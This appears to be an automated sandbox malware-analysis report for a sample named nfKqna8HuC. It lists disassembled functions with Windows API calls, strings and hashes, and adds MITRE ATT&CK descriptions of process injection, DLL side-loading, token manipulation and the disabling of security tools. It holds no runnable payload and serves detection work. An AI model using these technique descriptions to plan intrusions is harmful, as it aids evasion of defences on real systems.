Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1g
API String ID: 3814560230-2172628023
Opcode ID: f0aaf8c8ae22aebb70055a7904266b44b685df742e3ab32a855b4d1a46ee5c0b
Instruction ID: f9511573f8b3a49d7ac8e20b2548501e04dc3127b31e3c3210c9a1f72dc90ffe
Opcode Fuzzy Hash: f0aaf8c8ae22aebb70055a7904266b44b685df742e3ab32a855b4d1a46ee5c0b
Instruction Fuzzy Hash: 19211B75205341DFCB14EF68D890AA677E7EB5A320F25171DE96A8B3E0D730A840DF60

Function 006898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8

GetWindowRect.USER32(00000000,?), ref: 00689968
GetSysColor.USER32(00000012), ref: 00689982

Strings

static, xrefs: 00689945

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b60e4e4d0019b5afa69840b579a3fc4fda1e451fbfbe8e16808567f8f64abd52
Instruction ID: 3c133c267dc7c38cd6ae8ae62c9577373fd60fc56c33950792e262bcb493b504
Opcode Fuzzy Hash: b60e4e4d0019b5afa69840b579a3fc4fda1e451fbfbe8e16808567f8f64abd52
Instruction Fuzzy Hash: 09116A72610209AFDF04EFB8CC45AFA7BA9FB09344F051619F956E3250D734E811DB60

Function 00689617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00689699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006896A8

Strings

edit, xrefs: 0068967D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b63fe482d4205e1a3d2e82fc1f308fc98be1e19f61c9999e3b3cd4be24998877
Instruction ID: d9ebad7179a2e8273056360d548a2c08ad69c151896dc36238e7c204abd11eb5
Opcode Fuzzy Hash: b63fe482d4205e1a3d2e82fc1f308fc98be1e19f61c9999e3b3cd4be24998877
Instruction Fuzzy Hash: A6116A71500208ABFF116FA4DC84AFB3B6BEB05378F144314F965972E0E731AC91AB60

Function 00665262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006652D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006652F4

Strings

0, xrefs: 006652CE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a41eb357ce614d953741dab721614f8fd903d44981185896337a2313cadf44f5
Instruction ID: 0790f47c816511b47b2b846c98e0dce0255124aedd1376eef2e367cfbe1e3611
Opcode Fuzzy Hash: a41eb357ce614d953741dab721614f8fd903d44981185896337a2313cadf44f5
Instruction Fuzzy Hash: DF11D375901714ABDB10DE98D946BD977AAAB06B54F040016E903BB390E3B0EE44C7D1

Function 00674D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00674DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00674E1E

Strings

<local>, xrefs: 00674DE6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c80ef4d41a08a9c05bb558272ef18fe444630cf29a502a85a175b14e12ec4521
Instruction ID: b6d70815bb16abe79471af7760d00ea76975235573e63c8c1b4980db6465cfc6
Opcode Fuzzy Hash: c80ef4d41a08a9c05bb558272ef18fe444630cf29a502a85a175b14e12ec4521
Instruction Fuzzy Hash: 2A119E70501221FADB358B51888CEFBFAAAFF06764F10C22AF55956240DB70A941CAE0

Function 0064A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006537A7
___raise_securityfailure.LIBCMT ref: 0065388E

Strings

(n, xrefs: 00653889

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (n
API String ID: 3761405300-3602644056
Opcode ID: 434fae98f57e633eab0907c9e472edecb4e82f934a39cb9c0a52137cbe752545
Instruction ID: e7e05933747a0dc59ef8e8a3f0ce7b864a7bb58ea3d93dc1eb3dce04ab5fbee2
Opcode Fuzzy Hash: 434fae98f57e633eab0907c9e472edecb4e82f934a39cb9c0a52137cbe752545
Instruction Fuzzy Hash: 7F21CEB59013849AE750DF95EDDA6503BB7AB4C310F10682AE9048F3A0E3F469C4CB89

Function 0067A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000), ref: 0067A84E
htons.WSOCK32(00000000), ref: 0067A88B

Strings

255.255.255.255, xrefs: 0067A866

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: d5545d08cbb572449ba68bfa4ed0f4a3d711633387c8aa9c3c909730e20da1cf
Instruction ID: 57e28d68deadce697cbaaa04f07100406cbbf88b31ded9989bbb7d79a6c3309d
Opcode Fuzzy Hash: d5545d08cbb572449ba68bfa4ed0f4a3d711633387c8aa9c3c909730e20da1cf
Instruction Fuzzy Hash: A701D275200304ABCB10AFA8D886FEDB766EF85320F10C42AF51A9B3D1D771E8068B56

Function 0065B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0065B7EF

Strings

ListBox, xrefs: 0065B7B9
ComboBox, xrefs: 0065B78B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 82061406b1c976b3705edb121b1a05a560bb6f7dd6cf1be4f28da92c6fa31126
Instruction ID: d037281430f062ab0155056ced63203a46002b048277521ce83ce21f30b29d04
Opcode Fuzzy Hash: 82061406b1c976b3705edb121b1a05a560bb6f7dd6cf1be4f28da92c6fa31126
Instruction Fuzzy Hash: 28012871601128ABCB44EBA4DC529FE336BBF15321F04061DF862973C1EB70580CCB94

Function 0065B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0065B6EB

Strings

ListBox, xrefs: 0065B6B5
ComboBox, xrefs: 0065B687

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: feadaec688170cb5baad3239baa8b414fc067f596c364b9b97f6855c42b36e61
Instruction ID: 4a11a9c074f9de88c5ed90e177d2d3e6a19bf0171f72a155e89c6acfea5a4905
Opcode Fuzzy Hash: feadaec688170cb5baad3239baa8b414fc067f596c364b9b97f6855c42b36e61
Instruction Fuzzy Hash: 8701A271A41015ABDB44EBA4D952AFF73AA9F15341F14001DB842B72C1EB905E1C8BB9

Function 0065B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0065B76C

Strings

ListBox, xrefs: 0065B738
ComboBox, xrefs: 0065B70A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 69be2685f03a634f44ea094d551aa4f6593f002f6155167c1931590915482fd6
Instruction ID: 685471044cccd7a1fc907e07074fde1a2257aa61331c9065aa5c1b3a582b9816
Opcode Fuzzy Hash: 69be2685f03a634f44ea094d551aa4f6593f002f6155167c1931590915482fd6
Instruction Fuzzy Hash: 9501D671A40114BBDB40EBA4D952EFE73AE9B19341F14001DB842B32D2EBA05E0D8BB9

Function 00644D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00644D9E
__calloc_crt.LIBCMT ref: 00644DB7

Strings

"n, xrefs: 00644DCE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __calloc_crt
String ID: "n
API String ID: 3494438863-3918110435
Opcode ID: 81849414195607481e169afb79fc763f6a5c92e6caeb6f4a2e6c69b8b295ead8
Instruction ID: 5687ab8cb68418e94d29f158b70759bdc3b8b0b55a69f96e531fcd6e028a27d2
Opcode Fuzzy Hash: 81849414195607481e169afb79fc763f6a5c92e6caeb6f4a2e6c69b8b295ead8
Instruction Fuzzy Hash: 0FF0A471A097039EE7149F59BCA27A6679BEF04720B10451EF300CE294EB70C9414699

Function 00624024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00620000,00000063,00000001,00000010,00000010,00000000), ref: 00624048
EnumResourceNamesW.KERNEL32(00000000,0000000E,006667E9,00000063,00000000,75A90280,?,?,00623EE1,?,?,000000FF), ref: 006941B3

Strings

>b, xrefs: 00624028

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >b
API String ID: 1578290342-105418645
Opcode ID: e77d0c1804a839880ba4eee2a18f14c5d6047012784bc9f5a6640e53e4f0990a
Instruction ID: 69001317d846932b7dfa14f52acdf389f4fe33bc576d68eff2f4723fab7fc5b4
Opcode Fuzzy Hash: e77d0c1804a839880ba4eee2a18f14c5d6047012784bc9f5a6640e53e4f0990a
Instruction Fuzzy Hash: 9EF0623164039077D7205B15FC86FD63A5B975ABB5F101506F225AE1D0D6F094C09A94

Function 00667744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00667762
_wcscmp.LIBCMT ref: 00667774

Strings

#32770, xrefs: 0066776E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 3e1a2dd1f3da624bcab10093df8e76e656f30b900d4e774d786cea3ed7914b8c
Instruction ID: 6d31d92696c436a22a86b2f4826a4e270a1a1d6cc2fa684b8512d91c8c8fa2d3
Opcode Fuzzy Hash: 3e1a2dd1f3da624bcab10093df8e76e656f30b900d4e774d786cea3ed7914b8c
Instruction Fuzzy Hash: BBE09277A0436427D710AAA59C49ECBFBADAB52764F01006AB905D7281E660E6418BD4

Function 0065A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0065A63F

Part of subcall function 006413F1: _doexit.LIBCMT ref: 006413FB

Strings

Error allocating memory., xrefs: 0065A638
AutoIt, xrefs: 0065A633

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f993d81527c1c5f72d7f81acc64fa7ec5c7cdba88925c837e471d3427f084243
Instruction ID: f368181ac01b3a4aaa211b867bc8d20db738b49ad525685a77eae7bc57f9eb32
Opcode Fuzzy Hash: f993d81527c1c5f72d7f81acc64fa7ec5c7cdba88925c837e471d3427f084243
Instruction Fuzzy Hash: DDD05B313C472833D35536D97C17FC5754B9B16B61F05002ABF0D996C25DE6D98042DD

Function 0069AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0069ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0069AEBD

Strings

WIN_XPe, xrefs: 0069ACD3

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 6d851329317c355620dd93232d325f4f6923f5e6d863d54a2bfd0ecc519329e9
Instruction ID: 18ce4ef743dfb8e090a997d894a4e1ba3d824613c1204e124a5474d1765f69df
Opcode Fuzzy Hash: 6d851329317c355620dd93232d325f4f6923f5e6d863d54a2bfd0ecc519329e9
Instruction Fuzzy Hash: E4E06D70C00209DFCF11DBE4D984AECBBFEAB58300F109086E102B6A60CB305A85DF62

Function 006886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006886E2
PostMessageW.USER32(00000000), ref: 006886E9

Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0

Strings

Shell_TrayWnd, xrefs: 006886DB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f1d7886e108b1826269b565cd11419ba305bb4ba1d34d61cfb7e4797b780ecff
Instruction ID: 54a308a87b9e1444e0b0635bb7488b13dd9bd30051c49164c6bfe89cab4fe7dc
Opcode Fuzzy Hash: f1d7886e108b1826269b565cd11419ba305bb4ba1d34d61cfb7e4797b780ecff
Instruction Fuzzy Hash: AAD012317853247BF3A87770AC0BFC67A1A9B05B11F111819B746EA2D0C9E0F940CB59

Function 00688698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006886A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006886B5

Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0

Strings

Shell_TrayWnd, xrefs: 0068869B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 83f82513a47dcf36c9f10e8947f5ab96b271eb811d59f7f410154b35d257986c
Instruction ID: 58a4254d978236f1b24f92d7630a86ca891b3c3b393445fcea03c9f160d6718e
Opcode Fuzzy Hash: 83f82513a47dcf36c9f10e8947f5ab96b271eb811d59f7f410154b35d257986c
Instruction Fuzzy Hash: 35D01231794324B7F3A87770AC0BFC67A1A9B05B11F111819B74AEA2D0C9E0F940CB54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
